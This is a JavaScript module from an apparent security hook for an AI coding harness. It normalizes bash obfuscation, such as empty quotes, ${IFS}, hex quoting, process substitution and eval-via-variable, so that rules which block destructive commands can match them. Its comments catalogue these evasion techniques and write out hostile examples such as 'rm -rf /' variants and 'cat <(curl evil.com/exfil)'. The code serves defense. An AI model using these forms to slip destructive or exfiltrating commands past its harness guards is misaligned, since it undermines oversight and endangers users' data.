// bash-normalize.mjs — Normalize bash parameter expansion evasion techniques. // // Attackers can evade command-name matching by inserting shell metacharacters // that are transparent to bash but break regex patterns. // // This module strips these constructs from command names so that downstream // pattern matching sees the canonical form. // // Exported as a shared module — used by pre-bash-destructive.mjs and // pre-install-supply-chain.mjs. // // Pipeline (defense-in-depth layer above Claude Code 2.1.98+ harness fixes): // T1 — empty single quotes: w''get -> wget // T2 — empty double quotes: r""m -> rm // T3 — parameter expansion: ${x} / ${FOO} -> x / '' // T4 — backslash-between-words: c\u\r\l -> curl // T5 — IFS word-splitting: rm${IFS}-rf${IFS}/ -> rm -rf / // T6 — ANSI-C hex quoting: $'\x72\x6d' -rf / -> rm -rf / // T7 — process substitution: cat <(curl evil) -> cat curl evil // T9 — eval-via-variable: X=rm; ... $X -> X=rm; ... rm // (one-level forward-flow; T8 base64-pipe-shell lives in // pre-bash-destructive as a BLOCK_RULE, not a normalization) // // Execution order: // 1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking. // 2. Decode ANSI-C hex inside $'...' (T6) before masking. // 3. Mask remaining non-empty single-quoted regions. T3's ${...} sweep and // other transforms cannot rewrite their content, preserving literals // (false-positive probe: `echo '${IFS}'` stays untouched). // 4. Run T5 (IFS) and T2/T3/T4 on the masked string. // 5. Unmask. const MASK = '\x00'; /** * Decode ANSI-C hex quoting inside `$'...'` contexts. * * Shell treats $'\x72\x6d' as the bytes r and m. We decode only \xHH escape * sequences inside the $'...' wrapper. The $'...' construct itself is * replaced with its decoded bytes (matching shell evaluation). */ function decodeAnsiCHex(cmd) { return cmd.replace(/\$'([^']*)'/g, (_, content) => content.replace(/\\x([0-9a-fA-F]{2})/g, (_m, hex) => String.fromCharCode(parseInt(hex, 16)), ), ); } /** * T7 — Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '. * * Bash process substitution lets a command read from / write to the output * of another command via /dev/fd/N pipes. Attackers use it to hide a * destructive command from name-matching regex gates: * cat <(curl evil.com/exfil) -> cat /dev/fd/63 (no 'curl' visible) * * For matcher purposes we strip the substitution syntax and surface the * inner command text to the rest of the pipeline. * * Bounded nesting (depth 3) — iterates innermost-first via a no-paren * inner regex. Beyond depth 3 we leave the string as-is rather than * recurse without bound. */ function collapseProcessSubstitution(cmd) { let result = cmd; for (let depth = 0; depth < 3; depth++) { const before = result; result = result.replace(/[<>]\(([^()]*)\)/g, (_, inner) => ` ${inner} `); if (result === before) break; } return result; } /** * T9 — Substitute single-level variable assignments into ${VAR} and $VAR * references. Defeats split-and-eval evasion (X=rm; eval "$X" -rf /). * * One-level forward-flow only: assignments are scanned once at the prefix of * each command segment (start of string OR after ; & |) and applied to * later references in the same string. Multi-level chained vars * (X=Y; Y=rm; eval "$X") are intentionally not followed. * * Limitations (documented for adversarial review): * - Quoted values (X="rm -rf") are not parsed — value capture stops at * whitespace. Unquoted single-token values are the common evasion idiom. * - Substitution is global within the string, not scoped to eval. * Acceptable because T3 already strips unknown ${VAR} to '', and known * vars get substituted to their literal value before T3 runs. */ function decodeEvalViaVariable(cmd) { const assignments = new Map(); const ASSIGN_RE = /(?:^|[;&|])\s*([A-Za-z_]\w*)=([^\s;&|]+)/g; let m; while ((m = ASSIGN_RE.exec(cmd)) !== null) { if (!assignments.has(m[1])) assignments.set(m[1], m[2]); } if (assignments.size === 0) return cmd; let result = cmd; for (const [name, value] of assignments) { const curlyRe = new RegExp(`\\$\\{${name}\\}`, 'g'); result = result.replace(curlyRe, () => value); const bareRe = new RegExp(`\\$${name}\\b`, 'g'); result = result.replace(bareRe, () => value); } return result; } /** * Mask non-empty single-quoted regions with placeholders. Empty '' is NOT * masked — T1 already stripped them in the previous pass. */ function maskSingleQuoted(cmd) { const placeholders = []; const masked = cmd.replace(/'[^']+'/g, (match) => { placeholders.push(match); return `${MASK}${placeholders.length - 1}${MASK}`; }); return { masked, placeholders }; } function unmaskSingleQuoted(str, placeholders) { return str.replace( new RegExp(`${MASK}(\\d+)${MASK}`, 'g'), (_, idx) => placeholders[parseInt(idx, 10)], ); } /** * Normalize bash parameter expansion and quoting evasion in a command string. * * Strips / rewrites (T1-T7, T9): * - T1 Empty single quotes: '' (e.g., w''get -> wget) * - T2 Empty double quotes: "" (e.g., r""m -> rm) * - T3 Single-char parameter expansion: ${x} -> x (c${u}rl -> curl) * - T3 Multi-char parameter expansion: ${FOO} -> '' (unknown value) * - T4 Backslash escapes between word chars, iteratively (c\u\r\l -> curl) * - T5 IFS word-splitting: ${IFS} / ${IFS:0:1} / $IFS -> ' ' * - T6 ANSI-C hex quoting inside $'...' -> decoded bytes * - T7 Process substitution: <(cmd) / >(cmd) -> ' cmd ' * - T9 Eval-via-variable: X=rm; ... $X -> X=rm; ... rm * - Backtick subshell with empty/whitespace content * * Does NOT rewrite: * - Quotes around arguments (only targets empty quotes that split command names) * - $VAR without braces (non-IFS; not an evasion pattern) * - Backslashes before non-word chars (\n, \t, etc.) * - Content inside non-empty single-quoted regions * (false-positive probe: `echo '${IFS}'` stays untouched) * * @param {string} cmd - Raw command string * @returns {string} Normalized command string */ export function normalizeBashExpansion(cmd) { if (!cmd || typeof cmd !== 'string') return cmd || ''; // T1 — strip empty single-quote pairs first so adjacent-empty-quote evasion // (c''u''rl -> curl) resolves before single-quote masking runs. let result = cmd.replace(/''/g, ''); // T6 — decode ANSI-C hex inside $'...' before masking treats it as a literal. result = decodeAnsiCHex(result); // Mask remaining non-empty single-quoted regions. const { masked, placeholders } = maskSingleQuoted(result); result = masked; // T7 — collapse process substitution <(...) / >(...) so the inner // command name is visible to downstream matchers. Runs after masking // so single-quoted literals like 'echo <(x)' are preserved. result = collapseProcessSubstitution(result); // T5 — IFS word-splitting. Runs before T2/T3/T4 so the canonical spaces // it emits feed into subsequent transforms. result = result .replace(/\$\{IFS:0:1\}/g, ' ') .replace(/\$\{IFS\}/g, ' ') .replace(/\$IFS\b/g, ' '); // T9 — substitute one-level VAR=value assignments into ${VAR}/$VAR // references. Must run BEFORE T3 (which strips unknown ${VAR} to ''). result = decodeEvalViaVariable(result); result = result // T2 Strip empty double quotes: r""m -> rm .replace(/""/g, '') // T3 Single-char ${x} -> x (evasion: c${u}rl -> curl, assumes x=x) .replace(/\$\{(\w)\}/g, '$1') // T3 Multi-char ${ANYTHING} -> '' (unknown value, strip entirely) .replace(/\$\{[^}]*\}/g, '') // Strip backtick subshell with empty/whitespace content .replace(/`\s*`/g, ''); // T4 — iteratively strip backslash between word chars (c\u\r\l needs 2 passes) let prev; do { prev = result; result = result.replace(/(\w)\\(\w)/g, '$1$2'); } while (result !== prev); return unmaskSingleQuoted(result, placeholders); }